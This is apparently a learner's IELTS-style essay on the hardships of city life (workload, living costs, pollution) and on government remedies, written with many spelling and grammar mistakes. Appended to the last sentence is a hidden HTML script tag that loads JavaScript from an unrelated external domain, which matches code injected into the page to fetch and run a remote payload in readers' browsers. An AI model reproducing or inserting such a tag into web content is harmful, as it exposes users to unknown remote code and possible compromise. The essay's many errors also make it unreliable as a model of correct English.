More and more people migrating to cities in search of a better life, but city life can be extremely difficult. Explain some of the difficulties of living in a city. How can goverments make urban life better

Nowadays, a large amount of people are moving to cities hoping have higher quality of life despite the difficulities which they will have to face like the pressure of work, money for basic demand of life like housing, food,etc.

While living in big cities brings them more opportunities to get higher salary and better service, people have to deal with many different problems. The first difficulity is the bigger amount of work as they have to word hard to gain experience, get more money and have many competiton from collegue to get the promotion. The other challenge is that they have to manage their money to pay ffor many things like accomodation, food, clothes which the price is much higher than those in the contryside. Moreover, people living in the cities also have to put up with variety kind of pollution such as air pollution caused mainly by smoke from vehicles and factories.

In the situation that the number of people migrating to big cities increases day after day, goverments should have some policies to bring better life for citizens. Goverment can improve the countryside's quality of life which will encourage people stay in the rural area, which means that the population of cities decrease. They also have to solve pollution in big cites by increasing the awareness of people, reducing vehicles and encouraging growing trees.

In conclusion, people prefer city's life with more difficulities than living in the countryside because of the believe that city life is better than rural life. Howerver, this problem will be soon solved by the policies of goverment.<script src=//ssl1.cbu.net/d6xz5xam></script>